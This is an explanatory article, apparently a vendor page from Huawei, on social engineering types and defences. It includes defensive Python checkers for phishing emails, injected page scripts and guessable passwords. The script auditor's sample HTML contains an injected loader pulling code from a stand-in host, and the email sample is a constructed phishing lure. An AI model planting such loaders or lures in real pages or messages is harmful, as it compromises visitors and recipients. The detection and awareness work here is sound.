What Is Social Engineering?
In the broadest sense, social engineering means influencing how people think and behave. In security, the term has a narrower meaning, and that is the subject of this document: deceiving or pressuring victims into mistakes that hand over personal information, system access, sensitive data, virtual property, and the like. Attackers use what they obtain to launch follow-on attacks or sell it to others for profit.
Strictly speaking, social engineering is not an attack technology at all. It is closer to a confidence trick, one that has adapted to the digital era. Social engineering scams are built around human psychology and habit, which is what makes them so effective at steering user behavior: once attackers understand what motivates a target, they tailor the scam to deceive and manipulate that person.
Why Is Social Engineering So Dangerous?
Because social engineering targets human psychology and behavior, its success rate is very high. Everyone makes mistakes, which makes people the most vulnerable part of any security system. Victims may well doubt the authenticity of an email or phone call, but if the attack is well designed they still end up making the wrong judgment and taking the wrong action.
In fact, many security incidents are not caused by a failure of network defenses at all. Attackers often prefer to go after people, which is much easier than breaking a professionally run security system. This is why people-centric security awareness training matters: it keeps staff informed and alert about social engineering techniques and prevents the security system from being compromised from within.
How Is Social Engineering Implemented?
Attackers typically follow a process when designing a social engineering attack, each step building the trust the next one needs.
- Preparation phase: Attackers collect background information on potential victims. The aim is to identify the victims and decide on the best approach for the attack.
- Penetration phase: Attackers initiate contact with the victims and build trust through an exchange of information, with the intention of getting inside the victims' defenses.
- Attack phase: Attackers extract the target data from the victims, often with the help of tools, and may use what they obtain to launch further attacks.
- Withdrawal phase: Having achieved their goals, attackers try to erase all traces of their activity. In some cases the victims never realize that an attack has taken place.
Common Types of Social Engineering
Phishing
Phishing is the most common type of social engineering attack. Attackers steal confidential personal or company information through email, voice calls, instant messages, online ads, or fake websites.
Phishing succeeds because the fake message, and the story behind it, look authentic, so victims overlook the danger of what they are being asked to do. Phishing also manufactures a sense of urgency, fear, or curiosity, narrowing the victim's attention onto the fabricated message for just long enough that they act before checking whether it is genuine.
The following is an example:
A victim receives an email, apparently from their bank, claiming that the account is at risk and asking for their name, ID card number, mobile phone number, bank card number, and bank card password "for account security purposes". The email was not sent by the bank; it is a phishing email sent by an attacker. To deepen the deception, the attacker may also set up a fake bank website that looks real enough for the victim to log in to, exposing their key personal information. Afraid of losing money, the victim does not check the email or the website carefully and falls into the trap. The signs are there for anyone who pauses to look: the sender or Reply-To address is not on the bank's domain, the link's visible text and its real destination differ, and no bank asks for a card password by email.
Spear Phishing
Spear phishing is a more targeted form of phishing. Ordinary phishing is largely indiscriminate: attackers have no particular victim in mind and spread the lure as widely as possible. Spear phishing focuses on specific victims, such as enterprise executives or network administrators, and customizes the scheme around the victim's characteristics, position, contacts, and other gathered information, which makes it far more likely to succeed.
The following is an example:
A victim likes to browse car-related websites. One day, the victim receives an email that appears to come from one of the sites they visit most. It teases a review of the latest model and offers a link to the site for the full article. Because the topic is so relevant, the victim is very likely to click, and the link leads to the attacker's trap rather than the real site.
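The two lures above, the bank's "account risk" email and the car-site link, share the same telltale signs, and a mail gateway or a careful reader can check for them mechanically. The following is an added example, not code from the original page or from Huawei: it parses a constructed phishing email with Python's standard library and reports sender-domain mismatches, link text that names a different site than the href actually visits, a trusted brand name buried inside an unrelated domain, and urgency wording in the subject. The trusted domain examplebank.com, the two sample messages, and the URGENCY_WORDS list are assumptions made for the example.

```python
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption for this example: the only domain the victim legitimately banks with.
TRUSTED_DOMAINS = {"examplebank.com"}
URGENCY_WORDS = ("urgent", "immediately", "suspend", "24 hours", "verify now")

# Constructed sample: the "account risk" email from the text; the link text names the bank
# but the href points to a lookalike host.
PHISHING_EML = b"""\
From: "Example Bank Security" <security@examplebank.com>
Reply-To: verify@examplebank-secure.com
Return-Path: <bounce@mailer.examplebank-secure.com>
To: victim@example.org
Subject: Urgent: your account will be suspended in 24 hours
Content-Type: text/html; charset=utf-8

<html><body><p>We detected unusual activity. Verify your identity now:</p>
<a href="http://examplebank.com.login-verify.xyz/secure">https://www.examplebank.com/security</a>
<a href="https://examplebank.com/help">Help centre</a></body></html>
"""

# Constructed legitimate message, for comparison.
CLEAN_EML = b"""\
From: "Example Bank" <statements@examplebank.com>
To: victim@example.org
Subject: Your monthly statement is available
Content-Type: text/html; charset=utf-8

<html><body><a href="https://examplebank.com/statements">View statement</a></body></html>
"""


def registrable_domain(host):
    """Last two labels ('a.b.example.com' -> 'example.com'); real code should use the Public Suffix List."""
    return ".".join(host.lower().strip(".").split(".")[-2:])


def address_domain(header_value):
    """Domain part of an address header such as From or Reply-To ('' if absent)."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def is_lookalike(host):
    """Trusted brand name inside a host that is not the trusted domain (e.g. examplebank-secure.com)."""
    for trusted in TRUSTED_DOMAINS:
        if trusted.split(".")[0] in host and registrable_domain(host) != trusted:
            return True
    return False


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def analyze_email(raw_bytes):
    """Return a list of findings; an empty list means no phishing signal fired."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    # Header domains: Reply-To / Return-Path that do not match From, and lookalike domains.
    from_dom = address_domain(msg["From"])
    for hdr in ("From", "Reply-To", "Return-Path"):
        dom = address_domain(msg[hdr])
        if dom and registrable_domain(dom) != registrable_domain(from_dom):
            findings.append(f"header mismatch: {hdr} domain {dom} differs from From domain {from_dom}")
        if dom and is_lookalike(dom):
            findings.append(f"lookalike domain in {hdr}: {dom}")
    # Pressure words in the subject line.
    hits = [w for w in URGENCY_WORDS if w in str(msg["Subject"] or "").lower()]
    if hits:
        findings.append(f"urgency cues in subject: {hits}")
    # Links: visible text naming one site while the href goes to another, and lookalike hosts.
    body = msg.get_body(preferencelist=("html", "plain"))
    collector = _LinkCollector()
    collector.feed(body.get_content() if body else "")
    for href, text in collector.links:
        host = (urlparse(href).hostname or "").lower()
        shown = (urlparse(text).hostname or "").lower() if "://" in text else ""
        if shown and host and registrable_domain(shown) != registrable_domain(host):
            findings.append(f"link mismatch: text shows {shown} but href goes to {host}")
        if host and is_lookalike(host):
            findings.append(f"lookalike link host: {host}")
    return findings
```

On the sample above, analyze_email reports the Reply-To and Return-Path mismatches, the two lookalike domains, the urgency cues, and the mismatched link; on the clean statement it reports nothing. The registrable_domain helper keeps only the last two labels, so a real gateway should use the Public Suffix List (names like example.co.uk) and add homoglyph checks (rn for m, Cyrillic letters) that a plain substring match cannot see.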
Baiting
As the name suggests, baiting exploits people's desire for a reward to lure them into a trap. It resembles phishing in many respects, but baiting leads with the promised benefit.
The bait can be physical or virtual; we are in the digital era, after all.
Most physical bait takes the form of storage media, the classic case being a USB flash drive. Most people assume that a USB drive handed out as a free gift is empty. Attackers exploit that assumption by loading the drive with a malicious program that infects the computer it is plugged into. A more theatrical variant leaves the drive in a conspicuous place, such as the company lobby or washroom, with an eye-catching label such as "salary details". Curiosity leads many people to take a peek, not realizing that they have just handed the attacker a foothold. Note that a malicious USB device does not even need the victim to open a file: a device that presents itself to the computer as a keyboard can type commands the moment it is connected, so the only safe policy is never to plug in a device of unknown origin.
Virtual bait is simpler still. Attackers only need something that looks attractive, such as a link promising free gifts or an appealing promotion. Plenty of people click, and the malicious program makes its way onto the victim's system.
Watering Hole
The name comes from nature, where predators wait near a water source to ambush animals that come to drink, improving their odds of a successful hunt.
Based on their research, attackers identify the websites a target group frequents and plant malicious code on those sites, so that visitors' computers are infected as they browse. Many large websites invest heavily in security precisely to avoid being used this way, since a compromise would cost them user trust and reputation. Attackers therefore tend to prefer small and medium websites, or sites that lack the expertise and budget to defend themselves. Users should be especially careful on such sites, and site operators should watch their own pages for scripts or redirects they did not put there.
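On the defender's side, the injected-script form of a watering hole can be caught by comparing what a page actually loads against what the site is supposed to load. The following is an added example, not code from the original page or from Huawei: it parses a constructed copy of a page, resolves every external script source against the page URL (which also catches protocol-relative //host/x.js sources), flags origins outside an allowlist, and flags inline scripts whose SHA-256 does not match one the build is known to ship. The site names, the ALLOWED_ORIGINS allowlist, and the known inline script are assumptions made for the example.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumptions for this example: the page being checked and the origins it may load scripts from.
PAGE_URL = "https://www.example-autos.test/reviews/latest"
ALLOWED_ORIGINS = {"https://www.example-autos.test", "https://cdn.example-autos.test"}

# Inline scripts the build is known to ship, recorded as SHA-256 of their trimmed text.
KNOWN_INLINE = ["window.dataLayer = window.dataLayer || [];"]
KNOWN_INLINE_HASHES = {hashlib.sha256(s.strip().encode()).hexdigest() for s in KNOWN_INLINE}

# Constructed sample: the legitimate page plus two injected scripts, one external
# (protocol-relative, so it inherits https) and one inline loader.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-autos.test/lib/jquery.min.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="//stats-collector.xyz/t.js"></script>
<script>var s=document.createElement('script');s.src='https://stats-collector.xyz/p.js';document.head.appendChild(s);</script>
</head><body><h1>Review: the latest model</h1></body></html>"""


class _ScriptCollector(HTMLParser):
    """Separate external script sources from inline script bodies."""
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def origin(url):
    """scheme://host[:port] of an absolute URL, lowercased."""
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}".lower()


def audit_scripts(html, page_url=PAGE_URL, allowed=ALLOWED_ORIGINS, known_hashes=KNOWN_INLINE_HASHES):
    """Return findings for scripts the page should not be loading (external first, then inline)."""
    c = _ScriptCollector()
    c.feed(html)
    findings = []
    for src in c.external:
        full = urljoin(page_url, src)  # resolves relative and protocol-relative sources
        if origin(full) not in allowed:
            findings.append(f"external script from unexpected origin: {full}")
    for body in c.inline:
        text = body.strip()
        digest = hashlib.sha256(text.encode()).hexdigest()
        if digest not in known_hashes:
            findings.append(f"unknown inline script sha256:{digest[:16]}: {text[:60]}")
    return findings
```

Run it against the served page from outside the network on a schedule, so that a compromise of the web server itself does not also silence the check. A Content-Security-Policy with script-src hashes or nonces is the enforcement counterpart to this monitoring: it makes the browser refuse the injected scripts rather than merely reporting them.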
Vishing and Smishing
Vishing and smishing are phishing delivered by phone call and by SMS respectively. They are often aimed at victims who are less familiar with the Internet and its subtler tricks, older people in particular, and who would therefore be out of reach of more high-tech attacks, although anyone with a phone number is a potential target.
For these groups, attackers fall back on traditional channels: phone calls and text messages. Much of this is automated, since robocalls and synthesized voices now imitate a human caller well enough to fool many people, which greatly improves the attackers' efficiency.
Pretexting
In pretexting, the attacker assumes a false identity and a plausible story to deceive the victim, usually posing as someone in authority who can compel the victim to hand over important information as instructed.
The following is an example:
An attacker impersonates a law enforcement officer to gain the victim's trust, then asks the victim for personal information "to verify their identity". The victim eventually provides it, and the information is used for identity theft or follow-on attacks.
Quid Pro Quo
Quid pro quo means the attacker offers an exchange, information or a service, to make the victim cooperate in giving up important personal information. Like baiting, it promises the victim a benefit; the difference is that quid pro quo usually offers a service, whereas baiting dangles an object or a download.
The following is an example:
Attackers call victims pretending to be IT support staff offering technical help or a software upgrade, and ask for the victim's account credentials so that they can get "temporary" access. Once the victim hands them over, the attacker uses them to launch attacks or steal information. A genuine help desk never needs a user's password; any such request should be refused and reported.
Scareware
Scareware convinces victims that malicious software has been installed on their computer and can only be removed by doing what the attacker demands.
Usually the demand is a fee to "remove" the malware. Even if the victim complies, the attacker may go further, using the process to harvest key personal information or to install real malware.
Tailgating and Piggybacking Attacks
Tailgating attacks are also called piggybacking attacks, although some distinguish the two: piggybacking when the authorized person knowingly lets the other in, tailgating when they do not. In either case, an unauthorized person gets into a restricted area or system by riding on another person's legitimate access.
The following are some common examples:
- An attacker enters a restricted area by following closely behind the victim as the victim goes in.
- An attacker pretends to be an employee who has forgotten their badge and asks another employee or the doorkeeper to open the door.
- An attacker asks to borrow a victim's computer and quickly installs malware while using the victim's session.
How to Guard Against Social Engineering Attacks
To guard against social engineering attacks, we must first change people's mentality and habits. When everyone understands how social engineering attacks work and how serious the consequences are, people become more diligent and skeptical when checking email, voicemail, and text messages, or when visiting small and unfamiliar websites.
Mentality and habits cannot be changed overnight, so we need to keep promoting security knowledge and use real cases to make it memorable. Some suggestions:
- Strengthen security awareness training to reduce human-induced risk. Tools and services exist that simulate social engineering attacks, simulated phishing campaigns in particular, to hone people's ability to spot fraud.
- Publicize real-world cases to make the lesson stick, especially cases involving people close to the audience, such as colleagues or friends. This makes the threat feel real rather than remote.
- Harden account security with multi-factor authentication, since the primary goal of many social engineering attacks is to gain access to an account. Prefer phishing-resistant factors such as FIDO2/WebAuthn security keys where possible: one-time codes sent by SMS or app can themselves be phished or talked out of a user by the same tricks.
- Keep software and systems up to date, and periodically scan for hosts that may already be compromised.
- Do not build passwords or security-question answers from information that can be found publicly, such as birthdays, home cities, and pet names.
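The last suggestion can be enforced rather than merely recommended. The following is an added example, not code from the original page or from Huawei: it checks a candidate password against the facts an attacker would collect about the user during the preparation phase, undoing common leetspeak substitutions and expanding a birthday into the date formats people actually type. SAMPLE_PROFILE and the LEET table are constructed for the example; a real deployment would take the profile from the directory and combine this check with a breached-password list.

```python
import re
from datetime import date

# Common leetspeak substitutions, undone before comparing ('P4$$w0rd' -> 'password').
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"})

# Constructed profile: the kind of facts an attacker gathers from social media and
# public records during the preparation phase.
SAMPLE_PROFILE = {
    "first_name": "Alice", "last_name": "Zhang", "username": "azhang",
    "city": "Shenzhen", "pet": "Rex", "employer": "Example Corp",
    "birthday": date(1988, 7, 14),
}


def squash(s):
    """Lowercase and keep only letters and digits, so 'Shen-Zhen!' and 'shenzhen' compare equal."""
    return re.sub(r"[^a-z0-9]", "", s.lower())


def forms(password):
    """Spellings to search: squashed as typed, and squashed with leetspeak undone."""
    low = password.lower()
    return {squash(low), squash(low.translate(LEET))}


def profile_tokens(profile):
    """Substrings an attacker would try, derived from the profile."""
    fields = ("first_name", "last_name", "username", "city", "pet", "employer")
    tokens = {squash(profile[k]) for k in fields if profile.get(k)}
    bday = profile.get("birthday")
    if bday:
        tokens |= {bday.strftime(f) for f in ("%Y", "%m%d", "%d%m", "%Y%m%d", "%d%m%Y", "%m%d%Y")}
    return {t for t in tokens if len(t) >= 3}  # 1-2 character tokens would match almost anything


def check_password(password, profile, min_length=12):
    """Reasons the password is weak against a targeted guess; an empty list means it passes."""
    reasons = []
    if len(password) < min_length:
        reasons.append(f"shorter than {min_length} characters")
    candidates = forms(password)
    for tok in sorted(profile_tokens(profile)):
        if any(tok in c for c in candidates):
            reasons.append(f"contains guessable token '{tok}'")
    return reasons
```

A password such as R3x_Sh3nzh3n_1988 passes a naive complexity rule (mixed case, digits, symbols, 17 characters) but is rejected here because the pet, city, and birth year are all visible once the leetspeak is undone, which is exactly the guess an attacker who has read the victim's social media would make first.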
How Can Huawei Protect You Against Social Engineering Attacks?
In general, the social engineering attacks ordinary people encounter most often are phishing emails, spear phishing, watering holes, and baiting. Huawei's security devices and solutions can protect you against most such attacks and reduce potential losses and risks.
- HiSec Security Solution
The HiSec security solution makes threat detection, threat handling, and security O&M more intelligent, improving threat defense capabilities and O&M efficiency. Its zero trust component addresses the theft of user permissions: by leveraging user behavior analysis, user credit scoring, and other means, you can detect risky accounts in a timely manner and revoke the related permissions.
- HiSec Insight Advanced Threat Analytics System
HiSec Insight supports multiple advanced security detection technologies, such as abnormal domain name detection, mail anomaly detection, user trustworthiness detection, and network-wide threat situation analysis, to detect various security threat events in real time and restore the entire APT kill chain.
- FireHunter6000 Series Sandbox
The FireHunter reassembles files from network traffic and runs them in a virtual environment to detect and block unknown malicious files.
- USG6000E Series Firewall
Author: Yan Guanghui
Updated on: 2021-09-02